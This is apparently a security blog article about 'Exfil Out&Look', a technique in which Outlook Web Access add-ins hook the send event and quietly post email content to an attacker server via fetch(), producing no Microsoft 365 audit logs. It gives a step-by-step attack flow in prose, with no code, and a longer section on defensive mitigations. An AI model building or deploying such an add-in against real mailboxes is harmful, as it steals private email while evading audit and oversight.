For years, security teams have relied on Microsoft 365 Unified Audit Logs as a foundational control for threat detection, investigations, and compliance. But new research from Varonis Threat Labs reveals a dangerous reality: entire classes of email data exfiltration can occur without leaving any forensic trail.
The attack technique, dubbed “Exfil Out&Look,” abuses Microsoft Outlook add-ins to silently siphon sensitive email content—without triggering standard audit events, even in fully licensed Microsoft 365 E5 environments.
This isn’t malware in the traditional sense.
There’s no exploit chain.
No suspicious binaries.
No alerts.
Just legitimate functionality, quietly weaponized.
In this article, we’ll break down:
- What Exfil Out&Look is and why it matters
- How Outlook add-ins work under the hood
- Where Microsoft 365 visibility breaks down
- Realistic attack scenarios and threat models
- Practical detection, mitigation, and governance strategies
What Is Exfil Out&Look?
Definition and Overview
Exfil Out&Look is a stealthy data exfiltration technique that leverages Microsoft 365 Outlook add-ins to intercept and export email content without generating meaningful audit logs.
The technique targets a fundamental blind spot in Microsoft’s monitoring model—specifically, Outlook Web Access (OWA).
Unlike phishing or token theft, this attack:
- Uses legitimate Outlook extensibility
- Requires minimal permissions
- Leaves no actionable audit trail for defenders
Understanding Outlook Add-Ins
How Outlook Add-Ins Work
Outlook add-ins are web-based extensions, built using:
- HTML
- CSS
- JavaScript
Each add-in is defined by an XML manifest, which specifies:
- Required permissions
- Trigger events (e.g., message send, read)
- UI elements and integration points
- External endpoints the add-in can communicate with
Add-ins can interact with Microsoft services through Microsoft Graph APIs and native Outlook event hooks.
Deployment Models
Outlook add-ins can be deployed in multiple ways:
1. Per-User Deployment
- Installed via Outlook Web Access (OWA)
- Path: My Add-ins → Custom Add-ins
- No admin approval required (by default)
2. Tenant-Wide Deployment
- Deployed by Global or Exchange Administrators
- Via Microsoft 365 Admin Center
- Can be fixed for “Everyone”
- Cannot be removed by end users
This flexibility is powerful—but also dangerous when governance is weak.
The Critical Visibility Gap in Microsoft 365
Desktop vs OWA: A Logging Disparity
Varonis researchers identified a stark difference between Outlook platforms:
| Platform | Telemetry Generated |
|---|---|
| Outlook Desktop | Windows Event Viewer logs (Event ID 45) |
| Outlook Web Access (OWA) | No Unified Audit Log entry |
When an add-in is installed via Outlook Desktop, defenders at least get local host telemetry.
When the same add-in is installed via OWA:
- ❌ No Unified Audit Log entry
- ❌ No alert for add-in execution
- ❌ No record of data access or transmission
Even in E5 + Advanced Audit environments.
How Exfil Out&Look Works
Step-by-Step Attack Flow
At its core, Exfil Out&Look uses a minimally permissioned add-in that hooks into the OnMessageSend (ItemSend) event.
Step 1: Add-In Installation
- User uploads a custom manifest via OWA
- Or admin deploys add-in tenant-wide
Step 2: Event Hook Activation
- Add-in triggers on every email send
Step 3: Data Collection
Using only Read / ReadWriteItem permissions, the add-in accesses:
- Email subject
- Body content
- Recipients
- Timestamps
Step 4: Silent Exfiltration
A JavaScript payload:
- Executes a simple
fetch()call - Sends data to an attacker-controlled server
- Runs asynchronously and invisibly
No prompts.
No warnings.
No logs.
Why This Attack Is So Hard to Detect
Audit Logs Don’t Tell the Story
Varonis analyzed Microsoft 365 audit data during live testing and found:
- Only generic mailbox operations appear
- Events like:
- “Created mailbox item”
- “Accessed mailbox items”
- No indication that:
- An add-in intercepted the content
- Data was transmitted externally
- A script executed on send
From an incident response perspective, this is a forensic dead end.
Real-World Threat Scenarios
Who Can Abuse This Technique?
Exfil Out&Look is especially attractive for:
- Insider threats
- Compromised user accounts
- Abused admin roles
- Malicious or trojanized add-ins
- Supply chain attacks via add-in marketplaces
Because the behavior blends into normal operations, attackers can maintain long-term persistence with minimal risk of detection.
Why This Is a Microsoft 365 Security Blind Spot
Legitimate Feature, Illegitimate Use
From Microsoft’s perspective:
- The add-in behaves as designed
- Permissions are technically valid
- No explicit policy violation occurs
From a defender’s perspective:
- Sensitive data leaves the environment
- No alerts are raised
- No investigation trail exists
This mismatch highlights a broader issue: functionality ≠ security visibility.
Security and Compliance Implications
Risk to Regulated Organizations
For organizations subject to:
- GDPR
- HIPAA
- SOX
- PCI DSS
Silent email exfiltration creates:
- Data breach exposure
- Audit failures
- Regulatory penalties
- Loss of evidentiary integrity
An incident that cannot be reconstructed is often worse than one that can.
Recommended Mitigations and Best Practices
1. Lock Down Add-In Governance
- Disable custom manifest uploads where possible
- Restrict who can install add-ins via OWA
- Enforce approval workflows
2. Review Admin-Deployed Add-Ins Regularly
- Audit:
- Integrated Apps
- Add-ins fixed for “Everyone”
- Associated service principals
3. Monitor Outbound Network Traffic
- Inspect traffic from:
- Outlook clients
- OWA sessions
- Flag unusual external endpoints
4. Strengthen Privileged Access Controls
- Limit Global and Exchange Admin roles
- Apply just-in-time (JIT) access
- Monitor role abuse patterns
What Microsoft Needs to Fix
Varonis researchers strongly recommend that Microsoft introduce:
- Comprehensive audit logging for:
- Add-in installation
- Add-in execution
- Sensitive event hooks
- Risk-based add-in classification
- Stronger consent and warning mechanisms
Without these changes, this remains a zero-trace exfiltration vector.
Frequently Asked Questions (FAQs)
What is Exfil Out&Look?
Exfil Out&Look is a stealthy attack technique that uses Outlook add-ins to exfiltrate email data without triggering Microsoft 365 audit logs.
Does this affect Microsoft 365 E5 customers?
Yes. The technique works even in fully licensed E5 environments with Advanced Audit enabled.
Is this malware?
No. It uses legitimate Outlook extensibility features and standard permissions.
Can Microsoft Defender detect this?
Not reliably. The activity blends into normal mailbox operations and lacks specific telemetry.
How can organizations reduce risk?
By restricting add-in installation, auditing admin-deployed add-ins, and monitoring outbound traffic from Outlook clients.
Conclusion
Exfil Out&Look exposes a critical weakness in Microsoft 365 security visibility—one that attackers can exploit using nothing more than sanctioned features and minimal permissions.
For defenders, the lesson is clear:
If you can’t see it, you can’t secure it.
Organizations must treat Outlook add-ins as code execution surfaces, not harmless productivity tools. Until Microsoft closes the audit logging gap, strong governance, role control, and network monitoring are the only effective defenses.
Now is the time to reassess how much trust your environment places in invisible extensibility.
